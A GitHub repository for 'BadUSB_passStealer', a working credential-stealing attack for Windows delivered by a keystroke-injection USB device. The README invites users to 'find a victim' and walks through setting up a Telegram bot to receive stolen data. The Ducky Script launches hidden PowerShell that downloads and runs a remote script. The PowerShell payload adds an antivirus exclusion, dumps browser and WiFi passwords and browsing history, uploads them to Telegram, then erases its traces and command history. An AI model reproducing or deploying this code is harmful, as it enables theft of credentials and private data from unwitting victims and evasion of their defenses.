Repository: tuconnaisyouknow/BadUSB_passStealer
Branch: main
Commit: 15c75a73a047
Files: 4
Total size: 10.8 KB

Directory structure:
gitextract_ugr1m322/

├── LICENSE
├── README.md
└── upload/
    ├── BadUSB_passStealer_upload.txt
    └── ps.ps1

================================================
FILE CONTENTS
================================================

================================================
FILE: LICENSE
================================================
MIT License

Copyright (c) 2022 elliotYouKnow

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


================================================
FILE: README.md
================================================
# 💀 BadUSB_passStealer

## ⚠️ Warning  
Everything in this repository is **strictly** for educational purposes. **I am not responsible** for any stolen data. **You are responsible** for your actions when using this script for **BadUSB**.  

## ℹ️ About  
This **script** allows you to steal the following **information**:  
🔹 Browser **passwords** (Chrome, Firefox, Opera)  
🔹 **WiFi** passwords  
🔹 Browser **history** from the last 7 days  
🔹 A **list** of all **devices** connected to the victim's network  

## 🔑 Key Information for Users  

### ⚠️ MalDuino & Rubber Ducky Users  
You **must** replace **`CTRL-SHIFT ENTER`** with **`CTRL SHIFT ENTER`** in the [`ps.ps1`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/ps.ps1) file.  

✅ **Flipper Zero users**, no changes are needed—this syntax is already compatible.  

### ⚠️ Arduino Users  
🚫 I **stopped upgrading** `.ino` scripts. If you need them, you can **convert Ducky Scripts** [here](https://duckify.huhn.me/).  

### 🕒 Adjusting Delay  
You can customize the **delays** based on the **speed** of the **target machine**.

### ⏳ Waiting for Execution  
When you plug the **BadUSB** into a PC, **wait for the Caps Lock to flash** before unplugging it.  

---

# 🚀 Getting Started  

## 📌 Requirements  
✔️ A **BadUSB**  
✔️ Install **Arduino software** [here](https://www.arduino.cc/en/software) *(if using an Arduino-based BadUSB)*  
✔️ A **Telegram account**  
✔️ A **victim using Windows 10/11**  

---

# 🤖 Setting up a Telegram Bot for Uploading Files  

## 1️⃣ Create a Telegram Bot  
1️⃣ Open [Telegram Web](https://web.telegram.org/) and log in.  
2️⃣ Search for **@BotFather** in the Telegram search bar.  
3️⃣ Click **Start** to begin a conversation.  
4️⃣ Send `/newbot`.  
5️⃣ Choose a bot **name** and send it.  
6️⃣ Choose a bot **username** and send it.  
7️⃣ **@BotFather** will provide an API token:
   > Done! Congratulations on your new bot. You will find it at t.me/BOT_USERNAME. You can now add a description, about section, and profile picture for your bot. See /help for a list of commands.
   > Use this token to access the HTTP API:
   > **API_ACCESS_TOKEN**
   > For a description of the Bot API, see this page: https://core.telegram.org/bots/api

8️⃣ Start a chat with your bot by clicking **t.me/BOT_USERNAME** and pressing **Start**.  

## 2️⃣ Get Your Telegram API Token  
Your **API token** is provided in **@BotFather**'s response.  

## 3️⃣ Get Your Telegram Chat ID  
1️⃣ Open your browser and replace `API_ACCESS_TOKEN` in this URL:  
   ```
   https://api.telegram.org/bot<API_ACCESS_TOKEN>/getUpdates?offset=0
   ```
2️⃣ Send a **test message** to your bot on Telegram.  
3️⃣ Refresh the API page.  
4️⃣ Find your **chat ID** in the response JSON. Example:  
   ```
   "chat":{"id":123456789,"type":"private"}
   ```
   Your chat ID is **123456789**.  

---

# ⚙️ Installation for Rubber Ducky, Malduino W, and Flipper Zero  

1️⃣ **Download this repository**  

   🔹 **Linux:**  
   ```bash
   git clone https://github.com/tuconnaisyouknow/BadUSB_passStealer
   cd BadUSB_passStealer
   ```  

   🔹 **Windows:**  
   - Click the **green "Code" button** at the top right.  
   - Click **"Download ZIP"** and extract it.  

2️⃣ Replace **`<TOKEN>`** and **`<CHAT_ID>`** in [`ps.ps1`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/ps.ps1).  

3️⃣ **Upload `ps.ps1` to get a downloadable link**.  

4️⃣ Replace **`LINK`** in [`BadUSB_passStealer_upload.txt`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/BadUSB_passStealer_upload.txt) with the `ps.ps1` link.  

5️⃣ Place the `.txt` file in your **BadUSB**.  

6️⃣ **Find a victim and enjoy!** 🎭  

---

# 🛠️ NirSoft Tools  

🔗 You can download NirSoft tools here:  

🔹 **[WebBrowserPassView.exe](https://www.nirsoft.net/protected_downloads/passreccommandline.zip)** *(User: `download` | Password: `nirsoft123!`)*  
🔹 **[WNetWatcher.exe](https://www.nirsoft.net/utils/wireless_network_watcher.html)**  
🔹 **[BrowsingHistoryView.exe](https://www.nirsoft.net/utils/browsing_history_view.html)**  
🔹 **[WirelessKeyView.exe](https://www.nirsoft.net/utils/wireless_key.html)**  


================================================
FILE: upload/BadUSB_passStealer_upload.txt
================================================
REM                      _                        
REM  _   _  ___  _   _  | | ___ __   _____      __
REM | | | |/ _ \| | | | | |/ /  _ \ / _ \ \ /\ / /
REM | |_| | (_) | |_| |_|   <| | | | (_) \ V  V / 
REM  \__, |\___/ \__,_(_)_|\_\_| |_|\___/ \_/\_/  
REM  |___/                                        

REM ###########################################################
REM #                                                         #
REM # Title    : BadUSB_passStealer                           #
REM # Author   : you.know                                     #
REM # Version  : 2.0                                          #
REM # Category : Data Exfiltration, Credential Dumping        #
REM # Target   : Windows 10/11                                #
REM #                                                         #
REM # Description:                                            #
REM # - Launches PowerShell in hidden mode                    #
REM # - Extracts browser passwords and WiFi credentials       #
REM # - Saves them as .txt files                              #
REM # - Exfiltrates the data via Telegram                     #
REM # - Cleans up traces after execution                      #
REM #                                                         #
REM ###########################################################

REM Initial delay to ensure the system is ready
DELAY 2500

REM Minimize all active windows
GUI d
DELAY 500

REM Open Run dialog
GUI r
DELAY 500

REM Execute PowerShell hidden with administrative privileges
STRING powershell -w h -NoP -Ep Bypass -Command "irm <LINK> | iex"
CTRL-SHIFT ENTER
DELAY 1000
LEFT
DELAY 500
ENTER

REM Flash CAPSLOCK as an indicator that execution is complete
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK


================================================
FILE: upload/ps.ps1
================================================
#                      _                        
#  _   _  ___  _   _  | | ___ __   _____      __
# | | | |/ _ \| | | | | |/ /  _ \ / _ \ \ /\ / /
# | |_| | (_) | |_| |_|   <| | | | (_) \ V  V / 
#  \__, |\___/ \__,_(_)_|\_\_| |_|\___/ \_/\_/  
#  |___/                                        

$basePath = "C:\Users\Public\Documents\scripts"
$dumpFolder = "$basePath\$env:USERNAME-$(get-date -f yyyy-MM-dd)"
$dumpFile = "$dumpFolder.zip"

# Create directory
New-Item -ItemType Directory -Path $basePath -Force | Out-Null
Set-Location $basePath
New-Item -ItemType Directory -Path $dumpFolder -Force | Out-Null
Add-MpPreference -ExclusionPath $basePath -Force

# Download necessary tools
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WirelessKeyView.exe?raw=true -OutFile WirelessKeyView.exe
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WebBrowserPassView.exe?raw=true -OutFile WebBrowserPassView.exe
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/BrowsingHistoryView.exe?raw=true -OutFile BrowsingHistoryView.exe
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WNetWatcher.exe?raw=true -OutFile WNetWatcher.exe


# Execute tools to gather data
.\WNetWatcher.exe /stext connected_devices.txt
.\BrowsingHistoryView.exe /VisitTimeFilterType 3 7 /stext history.txt
.\WebBrowserPassView.exe /stext passwords.txt
.\WirelessKeyView.exe /stext wifi.txt

# Wait for the files to be fully written
while (!(Test-Path "passwords.txt") -or !(Test-Path "wifi.txt") -or !(Test-Path "connected_devices.txt") -or !(Test-Path "history.txt")) {
    Start-Sleep -Seconds 1
}

Move-Item passwords.txt, wifi.txt, connected_devices.txt, history.txt -Destination "$dumpFolder"

# Compress extracted data
Compress-Archive -Path "$dumpFolder\*" -DestinationPath "$dumpFile" -Force

# Wait until the ZIP file is created
while (!(Test-Path "$dumpFile")) {
    Start-Sleep -Seconds 1
}

# Telegram configuration
$token = "<TOKEN>"
$chatID = "<CHATID>"
$uri = "https://api.telegram.org/bot$token/sendDocument"
$caption = "Here are exfiltrated informations from $env:USERNAME"

# Check if the file exists before sending
if (!(Test-Path $dumpFile)) {
    exit 1
}

# Ensure System.Net.Http is available
if (-not ("System.Net.Http.HttpClient" -as [type])) {
    $httpPath = Get-ChildItem -Path "C:\Windows\Microsoft.NET\Framework64\" -Recurse -Filter "System.Net.Http.dll" | Select-Object -First 1 -ExpandProperty FullName
    if ($httpPath) {
        Add-Type -Path $httpPath
    } else {
        exit 1
    }
}

# Create HTTP client
$client = New-Object System.Net.Http.HttpClient
$content = New-Object System.Net.Http.MultipartFormDataContent
$content.Add((New-Object System.Net.Http.StringContent($chatID)), "chat_id")
$content.Add((New-Object System.Net.Http.StringContent($caption)), "caption")

# Attach the ZIP file
$filename = [System.IO.Path]::GetFileName("$dumpFile")
$fileStream = [System.IO.File]::OpenRead("$dumpFile")
$fileContent = New-Object System.Net.Http.StreamContent($fileStream)
$fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("application/octet-stream")
$content.Add($fileContent, "document", $filename)

# Send data to Telegram
try {
    $client.PostAsync($uri, $content).Wait()
} catch {}

# Cleanup
$fileStream.Close()
$fileStream.Dispose()

Set-Location C:\Users\Public\Documents
Remove-Item -Recurse -Force scripts
Remove-MpPreference -ExclusionPath "C:\Users\Public\Documents\scripts" -Force

# Caps Lock signal
$keyBoardObject = New-Object -ComObject WScript.Shell
for ($i=0; $i -lt 4; $i++) {
    $keyBoardObject.SendKeys("{CAPSLOCK}")
    Start-Sleep -Seconds 1
}

# Clear command history
Clear-Content (Get-PSReadlineOption).HistorySavePath

exit